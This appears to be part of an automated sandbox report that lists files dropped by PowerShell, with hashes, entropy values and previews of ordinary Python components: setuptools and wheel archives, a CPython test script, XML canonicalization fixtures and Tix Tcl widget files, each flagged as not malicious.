                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:24576:HsBJsJ7gQzm+uxutSwEygeL+OcOTMoO5u8VO/HsWB20:HsUJ7g4m+mfJygeLPAoOTVrWBz
                                                                                                                                                                                                              MD5:3B5B846E000DA033D54EEAAF7915126E
                                                                                                                                                                                                              SHA1:A650218F60EEA1F38AF46E8AF3B42135728BB897
                                                                                                                                                                                                              SHA-256:E728CA814A823BF7BF60162DAF9DB95B93D532948C4C0BEA762CE62F60189078
                                                                                                                                                                                                              SHA-512:AD7A81C60B2B3F190561178531123A0E2D278C4CD9615930D5B0276FC79BEA390F1CC92AB37061378EBEE09FC36C21440A4DB00F20029093570B7006CD14B25B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:PK.........m|V.}a.~...........distutils-precedence.pthE.... ...~..B.........a.4R.Am...P..p..m/.Ci..WA......I....Fm..'..Bv...i.&B>b-Y<Cggz.Leq.9(.........1$.[.....ny!..{jk...p..PK.........m|V..._............_distutils_hack/__init__.py.Xko.8..._A..,...G.p..v....:3A..~(...h..,."....>.D.....6z.>x.=.^j.rU....J..r.2.M.ek.7..'...v.J...H.T.j...8.WI2f..uq....2q*......b.^x]&..1...ZhQ.h....'.l...R.V...-._-LS..T../s.|#j-U..r...Xt9e7.^x....[.P5...YSf..../.u.O.:W.L+.n+.53+aw!.e.oeL...f..u......R.....{;K...Rq{1?..J.....v>.I/..../.........E.nV..m.5+U..gZ..W......Ap..!......"..N?.....EE.R.......Q...6mm@O.....x...*x&\|.w......=H...=..fk.e..y..(d$.Z.<.d*V|#U...%..W.V.o....v...w.@W.....\."CyO.(u...Gq...O...u...i.N.[..BA.,..2...K&...5L.T.3....Y{..}.....t..N|..!tu.....?..........+.C...3D$.......[.{l....c...S.b...|.f...Y.v.k.|.w.."...V}...%./o.xz...SQ..d.@. .L-..J....Z.k0...Z..x..e%...t...Ka........~...|y.O>|||......x...x1v.rij../;......@5...?.....q.G._.....$~...,...ia>.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):64545
                                                                                                                                                                                                              Entropy (8bit):7.958957200423682
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:z0LADMlwMcq2euhTVD2m9Yz+OQ5EvZx8/rCppYN:z0OtMcqBSDf9YSOQ5Evz8/r5N
                                                                                                                                                                                                              MD5:517D39F133BD7B1FF17CAF09784B7543
                                                                                                                                                                                                              SHA1:6AE6A9C1CC7F5D333F991B68030984484F5E718D
                                                                                                                                                                                                              SHA-256:D236B20E7CB522DAF2390FA84C55EEA81C5C30190F90F29AE2CA1AD8355BF247
                                                                                                                                                                                                              SHA-512:83C4511BC8186485C7E61DA1A798FDC41E209841300D70EA8E8F5515EC8200667B0195E3DF149A81F10E3EAA159E8BAB7F1701B43CE3D6746AEE79CD0BA862E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:PK........9ynV?.@.:...;.......wheel/__init__.pyK+..U..O+-)-J..W..-./*QH.../I,...+../K-*.....J.z&.z.J\.PK........9ynV.?n.............wheel/__main__.py]P.n. ....Vzhr(.u....v.*D.gA.;..6.?.i6.'...{.UU....B..i...B...j$}....'&89...a......W...(5.q...7....8.h...............@...0.O.(p...7s...i...o.....PU]..:........~!8nn..S+..}.o.;.27G...$v<wp~.r0..........5..L..K.....#V<...\&...z...,M:R....J.R[...b..PK........9ynVU.At|...........wheel/_setuptools_logging.py.RMo.@...+,ra..? ....V.rHZ.....1.1........mz........t<.Z.#{H(.$......p..$..x..p..t.~...4.,s....G......b.mZ.gZ.TX.Ql.lb.j...h.....u..`.........U.|.....~..8.4...F/.2.?.....l]u^...3^*I,....v..\..tiG.,5|.)A..9.G.x.|&.6.{.u..+j.,.L2..$.......7.t.....L..a...g...Q.u....'.h..5_.^#k=.w.+.V.n...^...S.k?..E].r.m...W......wmM.n=W......|...wy..,.5.....G...i........v(..PK........9ynV.Q..Z....M......wheel/bdist_wheel.py.<]w.8v...8.#r"q.8M.n...d|6.}.g.Y..HH."Y...q...{/...).....D......=.;8.y.p...5.9..u..4.M.-.&+...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1465
                                                                                                                                                                                                              Entropy (8bit):5.075698053067356
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:LypN6bjH3rBsDjcMdpXWzReiJK924QVsSQuQH6uMBHoCKM2AhORdxpzUm2ht4yyg:LY68/Lm9PK924QVsb3H6bBomJYNUB4U
                                                                                                                                                                                                              MD5:D29AC53A92A553A789C812FDDE79F5F9
                                                                                                                                                                                                              SHA1:02C091493C4E9B590161A030B8FB9CDA17BE2FEF
                                                                                                                                                                                                              SHA-256:C61A9BD1A909AC12252FA53AD032FFF3506B9F08F6151FAB8AC670851AA5BC9C
                                                                                                                                                                                                              SHA-512:8D6B845EC55FFB86CD0B49915BA3803A756325A0E6364EC09FEB8EE9CEADF18CAB3B11294D8E0C915249D1FAD221BD191D34BE27FBCD1845D12BDA4B13D75FB8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Script used to test os.kill on Windows, for issue #1220212....This script is started as a subprocess in test_os and is used to test the..CTRL_C_EVENT and CTRL_BREAK_EVENT signals, which requires a custom handler..to be written into the kill target.....See http://msdn.microsoft.com/en-us/library/ms685049%28v=VS.85%29.aspx for a..similar example in C..."""....from ctypes import wintypes, WINFUNCTYPE..import signal..import ctypes..import mmap..import sys....# Function prototype for the handler function. Returns BOOL, takes a DWORD...HandlerRoutine = WINFUNCTYPE(wintypes.BOOL, wintypes.DWORD)....def _ctrl_handler(sig):.. """Handle a sig event and return 0 to terminate the process""".. if sig == signal.CTRL_C_EVENT:.. pass.. elif sig == signal.CTRL_BREAK_EVENT:.. pass.. else:.. print("UNKNOWN EVENT").. return 0....ctrl_handler = HandlerRoutine(_ctrl_handler)......SetConsoleCtrlHandler = ctypes.windll.kernel32.SetConsoleCtrlHandler..SetConsoleCtrlHandle
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                              Entropy (8bit):5.062526860197769
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkeDF3NuyOvNu8J5Oy:coWiKeOcQ
                                                                                                                                                                                                              MD5:47214AC85BB440926A88296B7A02B5A0
                                                                                                                                                                                                              SHA1:EAC1E67856E7F1561DF7A48F184CC549838DA824
                                                                                                                                                                                                              SHA-256:8A53C429B7CB6B6563E7E661D9E215F0A6C561785CAC560B591724E1E28ADF91
                                                                                                                                                                                                              SHA-512:7C553F8DB1876EAC7AF799165E8B0301642AB8F67A222CA52BAF45F50F14C4587185212032049435A2E8FB1F084B108CADB9FCC387EC7BA1A428B17BA1270CDF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:IgnoreComments>true</c14n2:IgnoreComments>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):158
                                                                                                                                                                                                              Entropy (8bit):4.9785876488869265
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:I+dYsIF8C2wJS4RKbWOLCQMlYjmJS4RKbMfJkRBLU+dYsuyn:tohLc4sCO2Bl2mc4sSJknL5Oy
                                                                                                                                                                                                              MD5:B260D6694D6D19E125F6A4C92C31E2B7
                                                                                                                                                                                                              SHA1:23430641602AE8611AA3539720A3947A3C5533F4
                                                                                                                                                                                                              SHA-256:80C6FECE1AA90C54BF1B88C5C15A40B0BE2CD711DE04594A5EE63A5664114C01
                                                                                                                                                                                                              SHA-512:38C9A12A4684A9D6F7EF85020DF5048A52FF4D438C7BFC0C74567C5BFA854D2978B5D27837778F1387E98B35E7BEE3CF8723292D1DDC08D0FCB78FC83F50D6CA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" Algorithm="http://www.w3.org/2010/xml-c14n2">..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):261
                                                                                                                                                                                                              Entropy (8bit):5.124878878336803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkeDFA9co7Q5Oy:coWiKeq9cok
                                                                                                                                                                                                              MD5:A49404DA632C266E73206B8AFA7FF8BC
                                                                                                                                                                                                              SHA1:C517E0FB2D6E920D87E52993664F7544AAA2C557
                                                                                                                                                                                                              SHA-256:CBFD6BEADC30EDECD67279FE595CF7240405A2830090260A110CC0AE6ED0FC8C
                                                                                                                                                                                                              SHA-512:ACB8D85C110AAA77844E002ACFC7209D25C80B89636AD70C6028A80F00D076A59881EE515D46E934F8AC873CA84D2FEFA52C9FCE4490D87D1E246DDFA940EF51
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:PrefixRewrite>sequential</c14n2:PrefixRewrite>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):393
                                                                                                                                                                                                              Entropy (8bit):5.244390504173861
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkC7A9co7b4zxrIEC3Vic4subiKuvA5Oy:coWiKC09coU7C38iC
                                                                                                                                                                                                              MD5:20FA5C68A2A923F7D9DC8B844806A5BF
                                                                                                                                                                                                              SHA1:B492EDD43960A196B8BCF943F985D58497364BB5
                                                                                                                                                                                                              SHA-256:8BF883BF4D5FBB6189045D7F2B045F681FA9A4A6BCD32D1527B8647719A0DD9A
                                                                                                                                                                                                              SHA-512:8E749CD7EE178643FE9389CE5DAE5A791AE95FEFAA21489E24CCA6DE70BE5F3EB84A36D280F4C9D0C615BA805586C484CA815470BA49733D6FC2EC855E8B28AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:PrefixRewrite>sequential</c14n2:PrefixRewrite>.. <c14n2:QNameAware>.. <c14n2:QualifiedAttr Name="type" NS="http://www.w3.org/2001/XMLSchema-instance"/>.. </c14n2:QNameAware>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):438
                                                                                                                                                                                                              Entropy (8bit):5.2507636436148335
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:tohLc4sCO20Lc4sSJ6nMl2mc4sSJkC7A9co7b4zxM8RfElN3VioOx0RRfYz3VicV:coWiKC09coU+8BYN3kGRBYz3ceb
                                                                                                                                                                                                              MD5:1CDC6449F69411CCB1651E036626D80A
                                                                                                                                                                                                              SHA1:551EE0058E79B9E9D884BF603BA3F2576491FB7B
                                                                                                                                                                                                              SHA-256:011C04D25AEC5842E1F2796E60E0CBD60EED6B673C6B920889ACEABC233316A4
                                                                                                                                                                                                              SHA-512:84563C6448210C0D590C05A95B285ABD0CF03A61239E615AF8FF62F367834252ED43B3F6533B9A4B21539F75F5977307F79DB8190288A57947F62FC26AE530C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<dsig:CanonicalizationMethod xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:c14n2="http://www.w3.org/2010/xml-c14n2" Algorithm="http://www.w3.org/2010/xml-c14n2">.. <c14n2:PrefixRewrite>sequential</c14n2:PrefixRewrite>.. <c14n2:QNameAware>.. <c14n2:Element Name="bar" NS="http://a"/>.. <c14n2:XPathElement Name="IncludedXPath" NS="http://www.w3.org/2010/xmldsig2#"/>.. </c14n2:QNameAware>..</dsig:CanonicalizationMethod>....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:XML 1.0 document text (XSL stylesheet), ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):158
                                                                                                                                                                                                              Entropy (8bit):4.576368923570791
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:vFWWMNHUzCkcJzzvAXWQHUAFFgStRmJS4RKY9rlQRbduJzzKv:TMV0CkOvFS1sc4sQrur00
                                                                                                                                                                                                              MD5:AEAB5829675803C49D40C6181CDD5973
                                                                                                                                                                                                              SHA1:1207852B71B61B6B3F0CD3FD35FB4B254CA397C9
                                                                                                                                                                                                              SHA-256:B2E83EF8726FA8DFA9778277930B39A32E0D10805FDAE3823349836A7CAE00F3
                                                                                                                                                                                                              SHA-512:CA402B090B09D2ED733B1C9C2CDFC05669B119484FF3EAA359F746C658A9B9EE8944DD3201DC4418F4E1091551D1A4D0F7AF4AD08ABA36E6E6789FE07817974F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0"?>..<xsl:stylesheet version="1.0".. xmlns:xsl="http://www.w3.org/1999/XSL/Transform".. >..</xsl:stylesheet>..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):238
                                                                                                                                                                                                              Entropy (8bit):4.940116789175569
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:TMV0zz53Q2ibYaydnQLBsvo6MtoKMMscJnF4M/RwMsy:TMGzFA2ikqLqvoDtnJhRUy
                                                                                                                                                                                                              MD5:D8C541B9944E84CCB6B10270151CAAF0
                                                                                                                                                                                                              SHA1:D3C792EBE1DB0491DACEFE6FFE641D4E2A85594B
                                                                                                                                                                                                              SHA-256:4EA81760F654A8912BEA84F153DA83CC578119DBF6BB560740904C8E27271F99
                                                                                                                                                                                                              SHA-512:A71D8D0A0EF85E7FBB34DD08A78B8C5790886FCAFF2F872CCBC607E1DA28F1BBA20775214C9CFF45E782AEE7C6902DC5792E18F4ECC2667BD0E29173C77826C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0"?>....<?xml-stylesheet href="doc.xsl".. type="text/xsl" ?>....<!DOCTYPE doc SYSTEM "doc.dtd">....<doc>Hello, world! Comment 1 --></doc>....<?pi-without-data ?>.... Comment 2 -->.... Comment 3 -->..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2791
                                                                                                                                                                                                              Entropy (8bit):4.8790018878641455
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:RLX+4NvkpxySp4+Q7B527sw2jEjiMS4u2WTTKV9glB+QBgQBOJZL:FuvtEMJj6Fm6qQ2Qi
                                                                                                                                                                                                              MD5:574D955AECF9E75B8E69A6F5F91E8E4A
                                                                                                                                                                                                              SHA1:224DA313D96FFDBC417470007F1A36D052C61688
                                                                                                                                                                                                              SHA-256:E7D18E16F26125A2BDB3C972AAC52897A7D3E8630A0DA541916BFFCFCDAFA624
                                                                                                                                                                                                              SHA-512:35CD39E776120CF4A8E3818217207EACA9A02932B36F93236C443FF9C09A79B62D455D06DB5DE3F6FA63429451A5459CD08FE41099B8EF5D2428593432425B50
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: BtnBox.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# BtnBox.tcl --..#..#.Implements the tixButtonBox widget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixButtonBox {.. -superclass tixPrimitive.. -classname TixButtonBox.. -method {...add invoke button buttons.. }.. -flag {...-orientation -orient -padx -pady -state.. }.. -static {...-orientation.. }.. -configspec {...{-orientation orientation Orientation horizontal}...{-padx padX Pad 0}...{-pady padY Pad 0}...{-state state State normal}.. }.. -alias {...{-orient -orientation}.. }.. -default {...{.borderWidth ..1}...{.relief ..raised}...{.padX ...5}...{.padY ...10}...{*Button.anchor..c}...{*Button.padX..5}.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8098
                                                                                                                                                                                                              Entropy (8bit):5.043827072754844
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:7ZxUrMIHM7PKQKo1dueS07QxgIL/tKQBqT2Y+KA+l:7ZxUrMtPKQKWfUL/trQ2Y+/+l
                                                                                                                                                                                                              MD5:3069CFC8E58ECDF48C24EAECF7A5425A
                                                                                                                                                                                                              SHA1:7850C6987EC550779B6162D886FFF2997C58ACD6
                                                                                                                                                                                                              SHA-256:6FC5E7D99E1EAC0BC9ADE139C76BC8D0FCE72760ECD500D43CF390E69D6E5118
                                                                                                                                                                                                              SHA-512:99E50DC7F3BF5E416BA274844716E0AFE114CC5249D7F3BB010E14949F105E3D32E2DFFFB59B9CD38975F783070B587988C2ED0EFF47BCC99BE48851872FB496
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: CObjView.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# CObjView.tcl --..#..#.This file implements the Canvas Object View widget. This is a base..#.class of IconView. It implements:....#.(1) Automatic placement/adjustment of the scrollbars according..#.to the canvas objects inside the canvas subwidget. The..#.scrollbars are adjusted so that the canvas is just large..#.enough to see all the objects...#..#.(2) D+D bindings of the objects (%% not implemented)..#..#.(3) Keyboard traversal of the objects (%% not implemented). By the..#.virtual method :SelectObject...#..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixCObjView {.. -classname TixCObjView.. -superclass tixScrolledWidget.. -method
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5326
                                                                                                                                                                                                              Entropy (8bit):4.890412089497214
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Fq+vA/CIu89HU/FwHxrTPYu3tbv5hjgem:I+hI20HYMz5hjs
                                                                                                                                                                                                              MD5:A965237EEBB1267E873BE25F74E684F2
                                                                                                                                                                                                              SHA1:DA418C7C68A79F0A4E0238B44737F08B5D1B9113
                                                                                                                                                                                                              SHA-256:C60D13AA1304A2FADF5ABE57AE426C5CE92B5D88EABB4F9D088A58D75966F4F2
                                                                                                                                                                                                              SHA-512:74A9BFD6DEFE50648FFD0045EC5D9A9261751CA5E1613745BFC0B354CA2EEF214B7C10AF17EAC6DA1C4280D5772CEE4D841596213EA4F5F40115C941D0495E29
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: ChkList.tcl,v 1.6 2004/03/28 02:44:57 hobbs Exp $..#..# ChkList.tcl --..#..#.This file implements the TixCheckList widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixCheckList {.. -classname TixCheckList.. -superclass tixTree.. -method {...getselection getstatus setstatus.. }.. -flag {...-radio.. }.. -configspec {...{-radio radio Radio false tixVerifyBoolean}.....{-ignoreinvoke ignoreInvoke IgnoreInvoke true tixVerifyBoolean}.. }.. -static {...-radio.. }.. -default {...{.scrollbar...auto}...{.doubleClick...false}...{*Scrollbar.takeFocus 0}...{*borderWidth 1}...{*hlist.background #c3c3c3}...{
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):37829
                                                                                                                                                                                                              Entropy (8bit):5.001671043060591
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:TFmBT5QH9Uhs5S4ecvvIxLp/Zd2FiqDl2/226AVET4TZox6vATp0vnJ4qqgvopCf:TQrVNCenHqzU3Kvk
                                                                                                                                                                                                              MD5:EE19C2BE143534EBDF47CA3F0F46EAFB
                                                                                                                                                                                                              SHA1:F332A03EA51A48D506FA0DD046AC79787ADDF50D
                                                                                                                                                                                                              SHA-256:C794FD78FC3CEECBE92F021526750C6640A34BC38B361F55F84B97F64A34A15D
                                                                                                                                                                                                              SHA-512:D94057CA3E891CF1ADBDB81F5E20F75D97DBECC7B545D470A827F53A9DF003422AE175FF060925E93715B1CF43C1B95DE6AA120CC6B65634B97C74A6CA537477
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: ComboBox.tcl,v 1.9 2008/02/28 22:39:13 hobbs Exp $..#..# tixCombobox --..#..#.A combobox widget is basically a listbox widget with an entry..#.widget...#..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....global tkPriv..if {![llength [info globals tkPriv]]} {.. tk::unsupported::ExposePrivateVariable tkPriv..}..#--------------------------------------------------------------------------..# tkPriv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...#--------------------------------------------------------------------------..#..foreach fun {tkCancelRepeat tkListboxUpDown tkButtonUp} {.. if {![llength [info commands $fun]]} {...tk::unsupported::ExposePri
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):903
                                                                                                                                                                                                              Entropy (8bit):5.1689171385927555
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:RLu2usa9xNFjNOe2Hu1ILHAPvkSxy/gjsCuzqyOLl8vn:RLAjS/HAPvksy/gYDuyS8vn
                                                                                                                                                                                                              MD5:73D6D02CFE72C9FE2727D45ADB4E05B5
                                                                                                                                                                                                              SHA1:1802C5567E25C723F99C5FAF238ADE2E6D4CFA27
                                                                                                                                                                                                              SHA-256:D225201425FA2345B1014561A039140F24C3503C47D621FA38F07BE72D40726B
                                                                                                                                                                                                              SHA-512:AF303AFC7525BCD1031237BB6B1ED1E736BF3AD310AE84496C3329A6BA5A6AF6E10BEE7936C221FA322CE6D71272A0170CBE9B7B50A68E09A267D7275F47ED17
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Compat.tcl,v 1.3 2004/03/28 02:44:57 hobbs Exp $..#..# Compat.tcl --..#..# .This file wraps around many incompatibilities from Tix 3.6..#.to Tix 4.0...#..#.(1) "box" to "Box" changes..#.(2) "DlgBtns" to "ButtonBox" changes..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....foreach {old new} {.. tixDlgBtns tixButtonBox.. tixStdDlgBtns tixStdButtonBox.. tixCombobox tixComboBox.. tixFileSelectbox tixFileSelectBox.. tixScrolledListbox tixScrolledListBox..} {.. interp alias {} $old {} $new..}....proc tixInit {args} {.. eval tix config $args.. puts stderr "tixInit no longer needed for this version of Tix"..}..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15923
                                                                                                                                                                                                              Entropy (8bit):4.889468816446254
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:O5qoqCflaWHgBNwaroBM0xO6NK9WnzOMb7HeYfDZi3hmjP14ULS0:OYCflmTBroBXYsnzOMukxHLS0
                                                                                                                                                                                                              MD5:6A6CCD21561F8E67747009D4B0DE9E78
                                                                                                                                                                                                              SHA1:C28B0E9DE9DBEEAEBE389525932DEF93ACBFD405
                                                                                                                                                                                                              SHA-256:98E52FB9406B39BA950106B69A137506022868FDC34E34539AA38D5E86AAD2A5
                                                                                                                                                                                                              SHA-512:05FB538F3BE9356EB13BC92603F6C15AA9FB45ED992A44711DCE7040A1AEE524E8E3B67005FB5BBBC974A65086AD5DE271B3666024B2C0EC091EF871FE3D0EB4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Console.tcl,v 1.5 2008/02/27 22:17:28 hobbs Exp $..#..# Console.tcl --..#..#.This code constructs the console window for an application...#.It can be used by non-unix systems that do not have built-in..#.support for shells...#..#.This file was distributed as a part of Tk 4.1 by Sun..#.Microsystems, Inc. and subsequently modified by Expert..#.Interface Techonoligies and included as a part of Tix...#..#.Some of the functions in this file have been renamed from..#.using a "tk" prefix to a "tix" prefix to avoid namespace..#.conflict with the original file...#..# Copyright (c) 1995-1996 Sun Microsystems, Inc...# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "docs/license.tcltk" for information on usage and..# redistribution of the original file "console.tcl". These license..# terms do NOT apply to other files in the Tix distribution...#..# See the f
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12884
                                                                                                                                                                                                              Entropy (8bit):4.978322085803861
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5Tej1iEbVSma/3MJOCUvtIg3k/TJyybylJbDGXclDWODwOdN++zO/:5ORhSmS3YOCyI4XybymslDWYwOH++zO/
                                                                                                                                                                                                              MD5:99981081AF6FD4DAD4B735B146EE9F9D
                                                                                                                                                                                                              SHA1:4E0D5B3D110892FBE1CC905837F5463911369D2A
                                                                                                                                                                                                              SHA-256:053533C4FA7798D427252714834FA3F0645BCA63CA26F2492A44EFAB87342AFA
                                                                                                                                                                                                              SHA-512:A250D130471F80A3DF2EFD98237C80D2C7457C8B9E09B64ED5304228EAE2BBF33E39B99A49AE1E420756FCDEE6D47A6497D1B1D39CFD3FFD6EED9923F2DD7A9B
                                                                                                                                                                                                              Malicious:false
